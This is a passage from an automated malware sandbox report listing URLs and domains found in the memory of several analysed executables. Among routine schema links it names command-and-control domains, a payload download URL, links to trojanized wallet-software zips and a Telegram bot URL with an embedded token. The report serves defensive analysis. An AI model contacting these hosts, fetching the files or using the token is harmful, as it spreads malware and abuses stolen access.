                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    slipperyloo.lattrue
                      147.45.44.224:1912true

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                            https://www.google.com/ls68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl7620ab885d.exefalse
                                https://duckduckgo.com/chrome_newtab7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://duckduckgo.com/ac/?q=7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                                      https://payments.google.com/payments/v4/js/integrator.js16FBB2268f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl7620ab885d.exefalse
                                          https://observerfry.lat/tab9ba85c997.exe, 0000001D.00000003.2873027486.00000000014C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            http://tempuri.org/Entity/Id23ResponseDDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                              http://crl.microsoftb285303eae.exe, 0000001B.00000003.2788880393.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                http://tempuri.org/Entity/Id12ResponseDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0oQn68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://www.google.com/~68f6adf5d5.exe, 00000018.00000003.2433943122.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434620313.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434776422.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433545735.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432933293.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434384672.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2432718456.0000017A8AA11000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433513616.0000017A8AA0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://tempuri.org/DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          http://tempuri.org/Entity/Id2ResponseDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://ipinfo.io/jsonN/Aipcountry68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpfalse
                                                              http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                http://tempuri.org/Entity/Id21ResponseDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    http://185.215.113.16/off/random.exehpskotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                            https://observerfry.lat/piFb9ba85c997.exe, 0000001D.00000003.2894826392.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2929874595.00000000014C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://payments.google.com/payments/v4/js/integrator.jsle.com68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                  https://docs.google.com/68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://ipinfo.io/.568f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://sandbox.google.com/payments/v4/js/integrator.js69CC3D4Eema68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                https://aka.ms/nativeaot-compatibility0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                  https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://ipinfo.io/json68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://chrome.google.com/webstore7~68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://observerfry.lat/tI7620ab885d.exe, 00000009.00000003.2153831037.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154380185.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://aui-cdn.atlassian.com/7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://pancakedipyps.click/27ddd2a748c.exe, 00000013.00000003.2407658572.00000000013E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://tempuri.org/Entity/Id15ResponseDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://chrome.google.com/webstorep68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472513340.0000020F23D1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2256262756.000001D700001000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://observerfry.lat:443/api7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://api.ip.sb/ip0a7e8af92e.exe, 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://cheapptaxysu.click/((8469cb4d4d.exe, 0000000A.00000003.2191032954.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://observerfry.lat/VC7620ab885d.exe, 00000009.00000003.2147082754.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2148815532.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153727511.00000000057D1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2151146595.00000000057D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://chrome.google.com/webstoref68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470775814.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://microsoft.co7ddd2a748c.exe, 00000013.00000003.2407620521.0000000001432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://tempuri.org/Entity/Id1ResponseDDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://chrome.google.com/webstore68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://www.google.com/V68f6adf5d5.exe, 00000018.00000003.2433943122.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433545735.0000017A8AA16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433513616.0000017A8AA0E000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470775814.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://drive-daily-2.corp.google.com/68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://payments.google.com/payments/v4/js/integrator.js68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474972154.0000020F23CF8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475524790.0000020F23CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://treehoneyi.click/sZb285303eae.exe, 0000001B.00000003.2725668549.0000000000D22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://drive.google.com/uc?id=68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                                                                                                    https://payments.google.com/payments/v4/js/integrator.js22BD0CDAIw68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://tempuri.org/Entity/Id24ResponseDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://www.ecosia.org/newtab/7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://drive-daily-1.corp.google.com/68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://payments.google.com/payments/v4/js/integrator.js38917BB68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://drive-daily-5.corp.google.com/68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://pancakedipyps.click/apiB7ddd2a748c.exe, 00000013.00000003.2407658572.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, 7ddd2a748c.exe, 00000013.00000002.2409400845.00000000013CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://sandbox.google.com/payments/v4/js/integrator.jsCCDD9E26rro68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://chrome.google.com/webstoreA68f6adf5d5.exe, 00000018.00000003.2433194586.0000017A8AA06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://treehoneyi.click/apib285303eae.exe, 0000001B.00000002.2828205036.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2749262312.0000000000D22000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000002.2857529357.00000000054D0000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000002.2828788065.0000000000D22000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000002.2823943153.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2725668549.0000000000D22000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2636050594.000000000555D000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2816093785.0000000000D22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingDJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://ipinfo.io/68f6adf5d5.exe, 00000018.00000002.2602154875.0000017A8C7E0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpfalse
